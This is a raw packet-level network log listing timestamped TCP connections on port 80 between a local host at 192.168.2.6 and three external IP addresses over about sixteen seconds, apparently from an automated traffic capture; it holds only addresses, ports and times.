Aug 27, 2024 14:22:36.302773952 CEST	80	52638	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:36.302999020 CEST	80	52636	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:36.303095102 CEST	52638	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:36.303097010 CEST	52636	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:36.303236961 CEST	52638	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:36.309752941 CEST	80	52638	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:36.420332909 CEST	52629	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:36.420344114 CEST	52637	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:36.420428038 CEST	52638	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:36.423751116 CEST	52639	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:36.430433989 CEST	80	52639	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:36.433752060 CEST	52639	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:36.433828115 CEST	52639	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:36.440291882 CEST	80	52639	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:36.532463074 CEST	52641	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:36.532463074 CEST	52640	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:36.539155960 CEST	80	52640	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:36.539170027 CEST	80	52641	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:36.539268017 CEST	52640	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:36.539285898 CEST	52641	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:36.539454937 CEST	52640	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:36.539477110 CEST	52641	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:36.545981884 CEST	80	52640	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:36.545991898 CEST	80	52641	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:37.124433041 CEST	80	52639	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:37.124496937 CEST	52639	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:37.235136032 CEST	52639	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:37.235444069 CEST	52642	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:37.240324020 CEST	80	52642	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:37.240428925 CEST	52642	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:37.240499973 CEST	80	52639	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:37.240551949 CEST	52639	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:37.240638018 CEST	52642	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:37.245424986 CEST	80	52642	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:37.936342955 CEST	80	52642	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:37.936500072 CEST	52642	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:37.939311981 CEST	52642	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:37.939656973 CEST	52643	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:37.944349051 CEST	80	52642	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:37.944541931 CEST	80	52643	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:37.944608927 CEST	52642	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:37.944690943 CEST	52643	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:37.944971085 CEST	52643	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:37.949755907 CEST	80	52643	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:38.125298023 CEST	80	52640	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:38.127716064 CEST	52640	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:38.338872910 CEST	52640	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:38.343785048 CEST	80	52640	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:38.425090075 CEST	52644	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:38.429958105 CEST	80	52644	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:38.430099964 CEST	52644	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:38.430393934 CEST	52644	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:38.435182095 CEST	80	52644	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:38.626344919 CEST	80	52643	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:38.626405001 CEST	52643	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:38.735912085 CEST	52643	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:38.736284971 CEST	52645	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:38.741424084 CEST	80	52643	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:38.741473913 CEST	52643	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:38.741676092 CEST	80	52645	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:38.741729021 CEST	52645	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:38.741899014 CEST	52645	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:38.746665955 CEST	80	52645	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:39.452933073 CEST	80	52645	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:39.453001976 CEST	52645	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:39.456100941 CEST	52645	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:39.456460953 CEST	52646	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:39.461366892 CEST	80	52646	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:39.461379051 CEST	80	52645	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:39.461453915 CEST	52645	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:39.461467028 CEST	52646	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:39.461622000 CEST	52646	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:39.466649055 CEST	80	52646	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:40.034400940 CEST	80	52644	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:40.035794020 CEST	52644	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:40.035883904 CEST	52644	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:40.042201996 CEST	80	52644	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:40.144057035 CEST	52647	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:40.148927927 CEST	80	52647	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:40.151774883 CEST	52647	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:40.151860952 CEST	52647	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:40.156886101 CEST	80	52647	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:40.162899017 CEST	80	52646	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:40.163886070 CEST	52646	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:40.281687021 CEST	52646	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:40.284174919 CEST	52648	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:40.288731098 CEST	80	52646	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:40.290422916 CEST	80	52648	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:40.290519953 CEST	52646	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:40.290599108 CEST	52648	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:40.290786982 CEST	52648	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:40.297235012 CEST	80	52648	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:40.436784983 CEST	52648	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:40.436850071 CEST	52647	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:40.436907053 CEST	52641	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:40.440165997 CEST	52649	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:40.440697908 CEST	52650	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:40.440905094 CEST	52651	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:40.447468042 CEST	80	52649	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:40.447484016 CEST	80	52650	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:40.447498083 CEST	80	52651	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:40.447561979 CEST	52650	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:40.447562933 CEST	52649	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:40.447618961 CEST	52651	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:40.447762966 CEST	52649	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:40.447791100 CEST	52651	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:40.451206923 CEST	52650	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:40.454112053 CEST	80	52649	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:40.454123974 CEST	80	52651	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:40.457561016 CEST	80	52650	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:41.198617935 CEST	80	52649	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:41.198678017 CEST	52649	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:41.319123983 CEST	52649	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:41.319554090 CEST	52652	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:41.324378014 CEST	80	52652	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:41.324394941 CEST	80	52649	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:41.324445009 CEST	52652	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:41.324459076 CEST	52649	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:41.327677965 CEST	52652	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:41.332515955 CEST	80	52652	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:42.053913116 CEST	80	52650	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:42.055828094 CEST	52650	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:42.055857897 CEST	52650	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:42.057933092 CEST	80	52652	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:42.058180094 CEST	52652	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:42.060396910 CEST	52652	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:42.060802937 CEST	80	52650	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:42.060837984 CEST	52653	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:42.066276073 CEST	80	52653	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:42.066385031 CEST	52653	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:42.066551924 CEST	52653	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:42.066741943 CEST	80	52652	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:42.069715023 CEST	52652	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:42.071896076 CEST	80	52653	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:42.173012972 CEST	52654	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:42.177845955 CEST	80	52654	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:42.177963972 CEST	52654	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:42.178272963 CEST	52654	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:42.183084965 CEST	80	52654	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:42.892467022 CEST	80	52653	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:42.892528057 CEST	52653	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:43.001333952 CEST	52653	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:43.001629114 CEST	52655	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:43.006958961 CEST	80	52655	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:43.007019997 CEST	52655	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:43.007190943 CEST	80	52653	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:43.007220984 CEST	52655	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:43.007241964 CEST	52653	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:43.012032032 CEST	80	52655	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:43.765954018 CEST	80	52654	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:43.769850016 CEST	52654	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:43.771635056 CEST	52654	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:43.776511908 CEST	80	52654	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:43.797369003 CEST	80	52655	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:43.801695108 CEST	52655	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:43.812628984 CEST	52656	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:43.817576885 CEST	80	52656	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:43.820168018 CEST	52656	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:43.821659088 CEST	52656	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:43.827001095 CEST	80	52656	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:43.844182014 CEST	52655	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:43.844331026 CEST	52657	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:43.849318027 CEST	80	52655	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:43.849421024 CEST	52655	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:43.850145102 CEST	80	52657	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:43.853059053 CEST	52657	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:43.856909990 CEST	52657	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:43.861690044 CEST	80	52657	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:44.451585054 CEST	52651	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:44.451585054 CEST	52656	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:44.451617002 CEST	52657	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:44.572613955 CEST	52658	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:44.573205948 CEST	52660	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:44.573205948 CEST	52659	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:44.578139067 CEST	80	52658	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:44.578155041 CEST	80	52659	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:44.578164101 CEST	80	52660	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:44.578237057 CEST	52659	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:44.578237057 CEST	52658	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:44.578267097 CEST	52660	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:44.578648090 CEST	52658	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:44.578651905 CEST	52659	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:44.578891993 CEST	52660	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:44.583435059 CEST	80	52658	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:44.583631039 CEST	80	52659	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:44.584414959 CEST	80	52660	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:45.328027964 CEST	80	52659	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:45.328347921 CEST	52659	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:45.330492973 CEST	52659	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:45.330774069 CEST	52661	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:45.335726976 CEST	80	52659	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:45.335793972 CEST	52659	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:45.335882902 CEST	80	52661	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:45.335942030 CEST	52661	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:45.336055994 CEST	52661	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:45.340941906 CEST	80	52661	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:46.025358915 CEST	80	52661	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:46.025463104 CEST	52661	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:46.141516924 CEST	52661	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:46.141516924 CEST	52662	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:46.146554947 CEST	80	52662	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:46.146703005 CEST	80	52661	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:46.146728039 CEST	52662	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:46.146832943 CEST	52662	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:46.146888971 CEST	52661	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:46.151612997 CEST	80	52662	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:46.191693068 CEST	80	52658	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:46.192064047 CEST	52658	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:46.192095995 CEST	52658	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:46.194695950 CEST	52663	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:46.196947098 CEST	80	52658	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:46.199557066 CEST	80	52663	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:46.199661016 CEST	52663	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:46.199793100 CEST	52663	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:46.204684019 CEST	80	52663	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:46.884876966 CEST	80	52662	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:46.884962082 CEST	52662	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:47.007318974 CEST	52662	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:47.007653952 CEST	52664	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:47.013308048 CEST	80	52662	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:47.013325930 CEST	80	52664	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:47.013355017 CEST	52662	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:47.013441086 CEST	52664	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:47.013866901 CEST	52664	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:47.019098043 CEST	80	52664	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:47.759258032 CEST	80	52664	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:47.759366989 CEST	52664	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:47.800288916 CEST	80	52663	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:47.800395966 CEST	52663	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:47.800463915 CEST	52663	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:47.805713892 CEST	80	52663	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:47.875778913 CEST	52664	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:47.875782967 CEST	52665	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:47.880742073 CEST	80	52665	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:47.880810976 CEST	52665	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:47.881103039 CEST	52665	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:47.881201982 CEST	80	52664	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:47.881299019 CEST	52664	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:47.886019945 CEST	80	52665	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:47.909666061 CEST	52666	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:47.914500952 CEST	80	52666	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:47.914741039 CEST	52666	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:47.914792061 CEST	52666	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:47.919574976 CEST	80	52666	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:48.576586962 CEST	52665	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:48.576587915 CEST	52666	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:48.576663971 CEST	52660	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:48.580900908 CEST	80	52665	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:48.581032991 CEST	52665	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:48.581101894 CEST	52667	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:48.581283092 CEST	52669	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:48.581290960 CEST	52668	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:48.586564064 CEST	80	52667	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:48.586580992 CEST	80	52669	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:48.586591959 CEST	80	52668	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:48.586658001 CEST	52669	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:48.586658955 CEST	52667	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:48.586724043 CEST	52668	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:48.586813927 CEST	52667	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:48.587007046 CEST	52669	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:48.587008953 CEST	52668	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:48.592664003 CEST	80	52667	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:48.592956066 CEST	80	52669	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:48.593525887 CEST	80	52668	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:49.306616068 CEST	80	52669	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:49.306679010 CEST	52669	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:49.483764887 CEST	52669	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:49.484231949 CEST	52670	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:49.489109993 CEST	80	52670	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:49.489178896 CEST	52670	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:49.489339113 CEST	80	52669	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:49.489398003 CEST	52669	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:49.489495993 CEST	52670	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:49.494654894 CEST	80	52670	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:50.191356897 CEST	80	52670	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:50.191641092 CEST	52670	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:50.194159031 CEST	52670	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:50.195983887 CEST	52671	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:50.199423075 CEST	80	52670	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:50.199564934 CEST	52670	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:50.201015949 CEST	80	52671	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:50.204092026 CEST	52671	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:50.204725027 CEST	52671	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:50.208667040 CEST	80	52667	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:50.208983898 CEST	52667	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:50.208983898 CEST	52667	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:50.209681988 CEST	80	52671	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:50.213835001 CEST	80	52667	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:50.313498020 CEST	52672	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:50.318540096 CEST	80	52672	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:50.318648100 CEST	52672	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:50.321685076 CEST	52672	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:50.326543093 CEST	80	52672	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:50.909522057 CEST	80	52671	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:50.909574986 CEST	52671	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:51.016951084 CEST	52671	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:51.017376900 CEST	52673	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:51.022104025 CEST	80	52671	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:51.022144079 CEST	52671	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:51.022217989 CEST	80	52673	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:51.022272110 CEST	52673	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:51.022452116 CEST	52673	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:51.027184963 CEST	80	52673	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:51.715929031 CEST	80	52673	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:51.721735001 CEST	52673	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:51.725054026 CEST	52673	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:51.725591898 CEST	52674	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:51.730515003 CEST	80	52673	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:51.730600119 CEST	52673	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:51.730874062 CEST	80	52674	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:51.731072903 CEST	52674	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:51.731173038 CEST	52674	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:51.735956907 CEST	80	52674	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:51.926701069 CEST	80	52672	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:51.926820040 CEST	52672	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:51.926992893 CEST	52672	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:51.929903984 CEST	52675	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:51.931813002 CEST	80	52672	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:51.934705973 CEST	80	52675	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:51.934845924 CEST	52675	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:51.934978008 CEST	52675	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:51.939742088 CEST	80	52675	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:52.413768053 CEST	80	52674	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:52.417787075 CEST	52674	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:52.532329082 CEST	52674	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:52.532723904 CEST	52676	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:52.537533045 CEST	80	52676	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:52.537636995 CEST	80	52674	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:52.537755966 CEST	52676	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:52.537755966 CEST	52674	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:52.537863970 CEST	52676	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:52.542608976 CEST	80	52676	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:52.592216969 CEST	52668	80	192.168.2.6	89.23.103.42
